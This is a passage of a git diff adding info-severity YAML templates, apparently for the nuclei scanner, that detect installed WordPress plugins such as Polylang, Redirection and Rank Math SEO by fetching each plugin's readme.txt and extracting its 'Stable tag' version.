regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-photo-gallery.yaml b/technologies/wordpress/wordpress-photo-gallery.yaml new file mode 100644 index 0000000000..66ec1f4dc6 --- /dev/null +++ b/technologies/wordpress/wordpress-photo-gallery.yaml @@ -0,0 +1,35 @@ + +id: wordpress-photo-gallery + +info: + name: Photo Gallery by 10Web – Mobile-Friendly Image Gallery Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/photo-gallery/ + metadata: + plugin_namespace: photo-gallery + wpscan: https://wpscan.com/plugin/photo-gallery + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.yaml b/technologies/wordpress/wordpress-php-compatibility-checker.yaml new file mode 100644 index 0000000000..a9e7b826ea --- /dev/null +++ b/technologies/wordpress/wordpress-php-compatibility-checker.yaml @@ -0,0 +1,35 @@ + +id: wordpress-php-compatibility-checker + +info: + name: PHP Compatibility Checker Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/php-compatibility-checker/ + metadata: + plugin_namespace: php-compatibility-checker + wpscan: https://wpscan.com/plugin/php-compatibility-checker + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pixelyoursite.yaml b/technologies/wordpress/wordpress-pixelyoursite.yaml new file mode 100644 index 0000000000..632bcb6c18 --- /dev/null +++ b/technologies/wordpress/wordpress-pixelyoursite.yaml @@ -0,0 +1,35 @@ + +id: wordpress-pixelyoursite + +info: + name: PixelYourSite – Your smart PIXEL (TAG) Manager Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/pixelyoursite/ + metadata: + plugin_namespace: pixelyoursite + wpscan: https://wpscan.com/plugin/pixelyoursite + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-polylang.yaml b/technologies/wordpress/wordpress-polylang.yaml new file mode 100644 index 0000000000..45d2e3e5af --- /dev/null +++ b/technologies/wordpress/wordpress-polylang.yaml @@ -0,0 +1,35 @@ + +id: wordpress-polylang + +info: + name: Polylang Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/polylang/ + metadata: + plugin_namespace: polylang + wpscan: https://wpscan.com/plugin/polylang + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-popup-builder.yaml b/technologies/wordpress/wordpress-popup-builder.yaml new file mode 100644 index 0000000000..afb3783170 --- /dev/null +++ b/technologies/wordpress/wordpress-popup-builder.yaml @@ -0,0 +1,35 @@ + +id: wordpress-popup-builder + +info: + name: Popup Builder – Create highly converting, mobile friendly marketing popups. Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/popup-builder/ + metadata: + plugin_namespace: popup-builder + wpscan: https://wpscan.com/plugin/popup-builder + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-popup-maker.yaml b/technologies/wordpress/wordpress-popup-maker.yaml new file mode 100644 index 0000000000..1a7cfda317 --- /dev/null +++ b/technologies/wordpress/wordpress-popup-maker.yaml @@ -0,0 +1,35 @@ + +id: wordpress-popup-maker + +info: + name: Popup Maker – Popup for opt-ins, lead gen, & more Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/popup-maker/ + metadata: + plugin_namespace: popup-maker + wpscan: https://wpscan.com/plugin/popup-maker + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-duplicator.yaml b/technologies/wordpress/wordpress-post-duplicator.yaml new file mode 100644 index 0000000000..670c61336c --- /dev/null +++ b/technologies/wordpress/wordpress-post-duplicator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-post-duplicator + +info: + name: Post Duplicator Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/post-duplicator/ + metadata: + plugin_namespace: post-duplicator + wpscan: https://wpscan.com/plugin/post-duplicator + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/post-duplicator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-smtp.yaml b/technologies/wordpress/wordpress-post-smtp.yaml new file mode 100644 index 0000000000..f5e0b7e113 --- /dev/null +++ b/technologies/wordpress/wordpress-post-smtp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-post-smtp + +info: + name: Post SMTP Mailer/Email Log – Best Mail SMTP For WP Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/post-smtp/ + metadata: + plugin_namespace: post-smtp + wpscan: https://wpscan.com/plugin/post-smtp + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-post-types-order.yaml b/technologies/wordpress/wordpress-post-types-order.yaml new file mode 100644 index 0000000000..d1040d746b --- /dev/null +++ b/technologies/wordpress/wordpress-post-types-order.yaml @@ -0,0 +1,35 @@ + +id: wordpress-post-types-order + +info: + name: Post Types Order Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/post-types-order/ + metadata: + plugin_namespace: post-types-order + wpscan: https://wpscan.com/plugin/post-types-order + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml new file mode 100644 index 0000000000..26c5d56c65 --- /dev/null +++ b/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-premium-addons-for-elementor + +info: + name: Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/premium-addons-for-elementor/ + metadata: + plugin_namespace: premium-addons-for-elementor + wpscan: https://wpscan.com/plugin/premium-addons-for-elementor + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-pretty-link.yaml b/technologies/wordpress/wordpress-pretty-link.yaml new file mode 100644 index 0000000000..f36e8e786e --- /dev/null +++ b/technologies/wordpress/wordpress-pretty-link.yaml @@ -0,0 +1,35 @@ + +id: wordpress-pretty-link + +info: + name: Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/pretty-link/ + metadata: + plugin_namespace: pretty-link + wpscan: https://wpscan.com/plugin/pretty-link + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-really-simple-captcha.yaml b/technologies/wordpress/wordpress-really-simple-captcha.yaml new file mode 100644 index 0000000000..3e07acd7fa --- /dev/null +++ b/technologies/wordpress/wordpress-really-simple-captcha.yaml @@ -0,0 +1,35 @@ + +id: wordpress-really-simple-captcha + +info: + name: Really Simple CAPTCHA Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/really-simple-captcha/ + metadata: + plugin_namespace: really-simple-captcha + wpscan: https://wpscan.com/plugin/really-simple-captcha + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-really-simple-ssl.yaml b/technologies/wordpress/wordpress-really-simple-ssl.yaml new file mode 100644 index 0000000000..cc2fc8b7a5 --- /dev/null +++ b/technologies/wordpress/wordpress-really-simple-ssl.yaml @@ -0,0 +1,35 @@ + +id: wordpress-really-simple-ssl + +info: + name: Really Simple SSL Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/really-simple-ssl/ + metadata: + plugin_namespace: really-simple-ssl + wpscan: https://wpscan.com/plugin/really-simple-ssl + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-redirection.yaml b/technologies/wordpress/wordpress-redirection.yaml new file mode 100644 index 0000000000..cc626ff459 --- /dev/null +++ b/technologies/wordpress/wordpress-redirection.yaml @@ -0,0 +1,35 @@ + +id: wordpress-redirection + +info: + name: Redirection Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/redirection/ + metadata: + plugin_namespace: redirection + wpscan: https://wpscan.com/plugin/redirection + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-redux-framework.yaml b/technologies/wordpress/wordpress-redux-framework.yaml new file mode 100644 index 0000000000..fb9e067c3f --- /dev/null +++ b/technologies/wordpress/wordpress-redux-framework.yaml @@ -0,0 +1,35 @@ + +id: wordpress-redux-framework + +info: + name: Gutenberg Template and Pattern Library & Redux Framework Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/redux-framework/ + metadata: + plugin_namespace: redux-framework + wpscan: https://wpscan.com/plugin/redux-framework + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml new file mode 100644 index 0000000000..962316da48 --- /dev/null +++ b/technologies/wordpress/wordpress-regenerate-thumbnails.yaml @@ -0,0 +1,35 @@ + +id: wordpress-regenerate-thumbnails + +info: + name: Regenerate Thumbnails Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/regenerate-thumbnails/ + metadata: + plugin_namespace: regenerate-thumbnails + wpscan: https://wpscan.com/plugin/regenerate-thumbnails + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-safe-svg.yaml b/technologies/wordpress/wordpress-safe-svg.yaml new file mode 100644 index 0000000000..1772e8b1bb --- /dev/null +++ b/technologies/wordpress/wordpress-safe-svg.yaml @@ -0,0 +1,35 @@ + +id: wordpress-safe-svg + +info: + name: Safe SVG Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/safe-svg/ + metadata: + plugin_namespace: safe-svg + wpscan: https://wpscan.com/plugin/safe-svg + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.yaml b/technologies/wordpress/wordpress-seo-by-rank-math.yaml new file mode 100644 index 0000000000..11114deaab --- /dev/null +++ b/technologies/wordpress/wordpress-seo-by-rank-math.yaml @@ -0,0 +1,35 @@ + +id: wordpress-seo-by-rank-math + +info: + name: Rank Math SEO Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/seo-by-rank-math/ + metadata: + plugin_namespace: seo-by-rank-math + wpscan: https://wpscan.com/plugin/seo-by-rank-math + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sg-cachepress.yaml b/technologies/wordpress/wordpress-sg-cachepress.yaml new file mode 100644 index 0000000000..15056cfcce --- /dev/null +++ b/technologies/wordpress/wordpress-sg-cachepress.yaml @@ -0,0 +1,35 @@ + +id: wordpress-sg-cachepress + +info: + name: SiteGround Optimizer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/sg-cachepress/ + metadata: + plugin_namespace: sg-cachepress + wpscan: https://wpscan.com/plugin/sg-cachepress + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sg-security.yaml b/technologies/wordpress/wordpress-sg-security.yaml new file mode 100644 index 0000000000..e102e29290 --- /dev/null +++ b/technologies/wordpress/wordpress-sg-security.yaml @@ -0,0 +1,35 @@ + +id: wordpress-sg-security + +info: + name: SiteGround Security Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/sg-security/ + metadata: + plugin_namespace: sg-security + wpscan: https://wpscan.com/plugin/sg-security + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml new file mode 100644 index 0000000000..77b6792672 --- /dev/null +++ b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml @@ -0,0 +1,35 @@ + +id: wordpress-shortcodes-ultimate + +info: + name: WordPress Shortcodes Plugin — Shortcodes Ultimate Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/shortcodes-ultimate/ + metadata: + plugin_namespace: shortcodes-ultimate + wpscan: https://wpscan.com/plugin/shortcodes-ultimate + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml new file mode 100644 index 0000000000..a5343ca0ab --- /dev/null +++ b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml @@ -0,0 +1,35 @@ + +id: wordpress-shortpixel-image-optimiser + +info: + name: ShortPixel Image Optimizer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/shortpixel-image-optimiser/ + metadata: + plugin_namespace: shortpixel-image-optimiser + wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.yaml b/technologies/wordpress/wordpress-simple-custom-post-order.yaml new file mode 100644 index 0000000000..228937eed8 --- /dev/null +++ b/technologies/wordpress/wordpress-simple-custom-post-order.yaml @@ -0,0 +1,35 @@ + +id: wordpress-simple-custom-post-order + +info: + name: Simple Custom Post Order Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/simple-custom-post-order/ + metadata: + plugin_namespace: simple-custom-post-order + wpscan: https://wpscan.com/plugin/simple-custom-post-order + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-simple-page-ordering.yaml b/technologies/wordpress/wordpress-simple-page-ordering.yaml new file mode 100644 index 0000000000..779efdb309 --- /dev/null +++ b/technologies/wordpress/wordpress-simple-page-ordering.yaml @@ -0,0 +1,35 @@ + +id: wordpress-simple-page-ordering + +info: + name: Simple Page Ordering Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/simple-page-ordering/ + metadata: + plugin_namespace: simple-page-ordering + wpscan: https://wpscan.com/plugin/simple-page-ordering + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-siteguard.yaml b/technologies/wordpress/wordpress-siteguard.yaml new file mode 100644 index 0000000000..d1da80a6a8 --- /dev/null +++ b/technologies/wordpress/wordpress-siteguard.yaml @@ -0,0 +1,35 @@ + +id: wordpress-siteguard + +info: + name: SiteGuard WP Plugin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/siteguard/ + metadata: + plugin_namespace: siteguard + wpscan: https://wpscan.com/plugin/siteguard + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-siteorigin-panels.yaml b/technologies/wordpress/wordpress-siteorigin-panels.yaml new file mode 100644 index 0000000000..88852ad4d9 --- /dev/null +++ b/technologies/wordpress/wordpress-siteorigin-panels.yaml @@ -0,0 +1,35 @@ + +id: wordpress-siteorigin-panels + +info: + name: Page Builder by SiteOrigin Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/siteorigin-panels/ + metadata: + plugin_namespace: siteorigin-panels + wpscan: https://wpscan.com/plugin/siteorigin-panels + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-smart-slider-3.yaml b/technologies/wordpress/wordpress-smart-slider-3.yaml new file mode 100644 index 0000000000..593f65fcc4 --- /dev/null +++ b/technologies/wordpress/wordpress-smart-slider-3.yaml @@ -0,0 +1,35 @@ + +id: wordpress-smart-slider-3 + +info: + name: Smart Slider 3 Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/smart-slider-3/ + metadata: + plugin_namespace: smart-slider-3 + wpscan: https://wpscan.com/plugin/smart-slider-3 + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.yaml b/technologies/wordpress/wordpress-so-widgets-bundle.yaml new file mode 100644 index 0000000000..9c8b1b262f --- /dev/null +++ b/technologies/wordpress/wordpress-so-widgets-bundle.yaml @@ -0,0 +1,35 @@ + +id: wordpress-so-widgets-bundle + +info: + name: SiteOrigin Widgets Bundle Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/so-widgets-bundle/ + metadata: + plugin_namespace: so-widgets-bundle + wpscan: https://wpscan.com/plugin/so-widgets-bundle + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml new file mode 100644 index 0000000000..05aaf95168 --- /dev/null +++ b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ssl-insecure-content-fixer + +info: + name: SSL Insecure Content Fixer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ssl-insecure-content-fixer/ + metadata: + plugin_namespace: ssl-insecure-content-fixer + wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml new file mode 100644 index 0000000000..6d421b3e4e --- /dev/null +++ b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml @@ -0,0 +1,35 @@ + +id: wordpress-stops-core-theme-and-plugin-updates + +info: + name: Easy Updates Manager Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ + metadata: + plugin_namespace: stops-core-theme-and-plugin-updates + wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-sucuri-scanner.yaml b/technologies/wordpress/wordpress-sucuri-scanner.yaml new file mode 100644 index 0000000000..4930a39892 --- /dev/null +++ b/technologies/wordpress/wordpress-sucuri-scanner.yaml @@ -0,0 +1,35 @@ + +id: wordpress-sucuri-scanner + +info: + name: Sucuri Security – Auditing, Malware Scanner and Security Hardening Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/sucuri-scanner/ + metadata: + plugin_namespace: sucuri-scanner + wpscan: https://wpscan.com/plugin/sucuri-scanner + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-svg-support.yaml b/technologies/wordpress/wordpress-svg-support.yaml new file mode 100644 index 0000000000..1b57ac411b --- /dev/null +++ b/technologies/wordpress/wordpress-svg-support.yaml @@ -0,0 +1,35 @@ + +id: wordpress-svg-support + +info: + name: SVG Support Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/svg-support/ + metadata: + plugin_namespace: svg-support + wpscan: https://wpscan.com/plugin/svg-support + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.yaml b/technologies/wordpress/wordpress-table-of-contents-plus.yaml new file mode 100644 index 0000000000..dd08543ee5 --- /dev/null +++ b/technologies/wordpress/wordpress-table-of-contents-plus.yaml @@ -0,0 +1,35 @@ + +id: wordpress-table-of-contents-plus + +info: + name: Table of Contents Plus Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/table-of-contents-plus/ + metadata: + plugin_namespace: 